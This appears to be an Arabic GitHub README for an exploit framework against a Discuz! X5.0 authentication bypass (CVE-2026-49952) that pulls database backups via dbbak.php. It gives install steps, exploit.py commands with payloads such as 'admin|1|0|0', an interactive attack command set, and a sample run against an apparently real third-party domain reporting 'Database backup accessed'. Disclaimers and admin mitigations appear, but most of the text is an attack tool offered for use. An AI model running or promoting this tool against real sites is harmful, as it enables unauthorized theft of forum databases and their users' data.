
Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - ثغرة حرجة تسمح بالوصول إلى النسخ الاحتياطية لقاعدة البيانات دون مصادقة، عبر إعادة استخدام رمز أوراكل التشفيري UC_KEY. درجة الخطورة CVSS 9.1. أداة كاملة الميزات مع كشف الإصدار، وهجمات متعددة الحمولات، وقشرة تفاعلية، واستغلال آلي. للاختبارات المصرح بها فقط.
⚡ CVE-2026-49952 | CVSS 9.1 (حرجة) | الإصدار 1.0.0
أداة اختبار اختراق احترافية مصممة لاكتشاف وإظهار الثغرة الحرجة الخاصة بتجاوز المصادقة في Discuz! X5.0.
إشعار هامهذه الأداة مقدمة لأغراض تعليمية ولاختبارات أمنية مصرح بها فقط.لا تستخدم هذه الأداة على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني وغير أخلاقي.لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناجم عن هذه الأداة.باستخدامك لهذه الأداة، فإنك توافق على الامتثال لجميع القوانين واللوائح المعمول بها.
إطار عمل استغلال تجاوز المصادقة في Discuz! X5.0 مصمم لاكتشاف وإظهار الثغرة الحرجة الخاصة بتجاوز المصادقة (CVE-2026-49952) في إصدارات Discuz! X5.0 الصادرة بين 20 مارس 2026 و1 مايو 2026.
تسمح هذه الثغرة للمهاجمين غير المصادقين بالوصول إلى وظيفة النسخ الاحتياطي لقاعدة البيانات (dbbak.php) من خلال استغلال UC_KEY encryption oracle لإعادة استخدام الرمز المميز، مما قد يعرّض محتويات حساسة من قاعدة البيانات للخطر.
🏆 درجة CVSS: 9.1 (حرجة)
🔐 التأثير: تجاوز المصادقة
📂 الوصول: ملفات النسخ الاحتياطي لقاعدة البيانات
⚡ التعقيد: منخفض (سهل الاستغلال)
🎯 الهدف: Discuz! X5.0 (20260320 - 20260501)
توجد الثغرة في نقطة النهاية dbbak.php حيث تعتمد آلية التحقق من الرمز المميز على UC_KEY encryption oracle. من خلال صياغة حمولة محددة في طلب تسجيل الدخول (member.php)، يمكن للمهاجم الحصول على رمز مصادقة صالح يمكن إعادة استخدامه للوصول إلى وظيفة النسخ الاحتياطي لقاعدة البيانات دون الحصول على تفويض مناسب.
❌ Discuz! X5.0 (20260320 - 20260501) - قابلة للاستغلال
✅ Discuz! X5.0 (20260510+) - مُصلحة
🔍 اكتشاف الإصدار: بصمة تلقائية وتحديد إصدار Discuz!.
⚡ هجوم متعدد الحمولات: اختبار متوازٍ لعدة متغيرات من الحمولات.
🖥️ واجهة تفاعلية: واجهة سطر أوامر كاملة الميزات للاستغلال اليدوي.
🚀 استغلال آلي: استغلال بنقرة واحدة مع حد أدنى من الإعداد.
📊 حفظ النتائج: تصدير نتائج الاستغلال إلى ملفات بختم زمني.
🌐 دعم الوكيل (Proxy): إعداد وكيل HTTP/HTTPS للتنقل عبر الشبكة.
🎯 فحص متعدد الخيوط: عدد خيوط قابل للضبط لتحسين الأداء.
🎨 مخرجات ملونة: مخرجات طرفية احترافية مرمّزة بالألوان.
🔐 دعم SSL/TLS: يتعامل مع أهداف HTTP وHTTPS.
🔄 إدارة الجلسات: يحافظ على حالة جلسة مستمرة.
📦 تخصيص الحمولة: دعم حقن حمولات مخصصة.
🎯 التحقق من الهدف: يتحقق من تثبيت Discuz! قبل الاستغلال.
Python: الإصدار 3.7 أو أحدث
Pip: مدير حزم Python
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework
# Install required packages
pip install -r requirements.txt
# Verify installation
python3 exploit.py --help
# Build the Docker image
docker build -t exploit .
# Run the container
docker run -it --rm exploit http://target.com
# Simple exploitation
python3 exploit.py http://target.com
# With output file
python3 exploit.py http://target.com --output results.txt
# Verbose mode for debugging
python3 exploit.py http://target.com --verbose
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10
# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"
python3 exploit.py http://discuz.eda.com.my
██████╗ ██╗███████╗██╗ ██╗███████╗███████╗██████╗
██╔══██╗██║██╔════╝██║ ██║╚══███╔╝╚══███╔╝╚════██╗
██║ ██║██║███████╗██║ ██║ ███╔╝ ███╔╝ █████╔╝
██║ ██║██║╚════██║██║ ██║ ███╔╝ ███╔╝ ██╔═══╝
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝
Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt
╔══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════╣
║ Target: http://discuz.eda.com.my ║
║ Authcode: aBcDeFgHiJkLmNoPqRsT... ║
║ Status: Database backup accessed ║
║ Data Size: 24567 bytes ║
║ Saved to: discuz_exploit_20260724_143218.txt ║
╚══════════════════════════════════════════════════════════╝
ابدأ الواجهة التفاعلية للاستغلال اليدوي:
python3 discuz_exploit.py http://target.com --interactive
استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
احصل على تفويض كتابي قبل الاختبار.
اتبع ممارسات الإفصاح المسؤول.
أبلغ الموردين بالثغرات بشكل صحيح.
استخدمها في بيئات معملية معزولة للتعلم.
لا تستخدمها أبدًا ضد أنظمة الإنتاج دون تفويض.
لا تشارك البيانات المستغلة علنًا.
لا تستخدمها أبدًا في أنشطة غير قانونية أو سرقة بيانات.
لا تعدّل أو تحذف البيانات أثناء الاختبار.
لا تستغل أبدًا دون موافقة.
لمسؤولي الأنظمة:
حدّث فورًا: قم بالترقية إلى Discuz! X5.0 (20260510+) أو أحدث.
عطّل نقطة النهاية: عطّل dbbak.php مؤقتًا إذا لم تكن هناك حاجة إليها.
راقب السجلات: ترقب الوصول المشبوه إلى member.php وdbbak.php.
قواعد WAF: نفّذ قواعد جدار حماية تطبيقات الويب لحظر الطلبات الخبيثة.
القائمة البيضاء للعناوين: قيّد الوصول إلى نقطة نهاية النسخ الاحتياطي على عناوين IP موثوقة.
Error: Failed to connect to target
Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
Error: Authentication failed or invalid authcode
Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details
هذا المشروع مرخّص بموجب رخصة MIT.
حقوق النشر © 2026 Sudeepa Wanigarathna
يُمنح بموجب هذا الإذن مجانًا لأي شخص يحصل على نسخة من هذا البرنامج وملفات التوثيق المرتبطة به ("البرنامج")، للتعامل مع البرنامج دون أي قيود، بما في ذلك على سبيل المثال لا الحصر حقوق الاستخدام والنسخ والتعديل والدمج والنشر والتوزيع والترخيص الفرعي و/أو بيع نسخ من البرنامج، والسماح للأشخاص الذين يُسلَّم إليهم البرنامج بفعل ذلك، وفقًا للشروط التالية:
يجب تضمين إشعار حقوق النشر أعلاه وإشعار الإذن هذا في جميع النسخ أو الأجزاء الجوهرية من البرنامج.
يُقدَّم البرنامج "كما هو"، دون أي ضمان من أي نوع، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر ضمانات القابلية للتسويق والملاءمة لغرض معين وعدم التعدي. لا يتحمل المؤلفون أو أصحاب حقوق النشر بأي حال من الأحوال المسؤولية عن أي مطالبة أو أضرار أو مسؤولية أخرى، سواء في إطار عقد أو ضرر أو غير ذلك، تنشأ عن أو تتعلق بالبرنامج أو باستخدامه أو التعاملات الأخرى معه.
المؤلف: Sudeepa Wanigarathna | GitHub: @CerberusMrXi
⭐ إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة!
🔐 استخدم بمسؤولية. حافظ على الأخلاقيات. واصل التعلم.
| السمة | التفاصيل |
|---|
| نوع الثغرة | تجاوز المصادقة |
| معرف CVE | CVE-2026-49952 |
| إصدار CVSS | 3.1 |
| درجة CVSS | 9.1 (حرجة) |
| متجه الهجوم | الشبكة |
| تعقيد الهجوم | منخفض |
| الصلاحيات المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
| تأثير السرية | مرتفع |
| تأثير السلامة | مرتفع |
| تأثير التوافر | مرتفع |
| نضج كود الاستغلال | وظيفي |
| مستوى المعالجة | إصلاح رسمي متاح |
| الأمر | الوصف | المثال |
|---|
help | عرض جميع الأوامر المتاحة | help |
scan | اكتشاف إصدار Discuz! والتحقق من الثغرة | scan |
get [payload] | استخراج authcode (حمولة مخصصة اختيارية ) | `get admin |
exploit [op] | تنفيذ الاستغلال (الافتراضي: backup) | exploit backup |
save | حفظ النتائج في ملف | save |
info | عرض معلومات الجلسة | info |
clear | مسح شاشة الطرفية | clear |
exit / quit | الخروج من الواجهة التفاعلية | exit |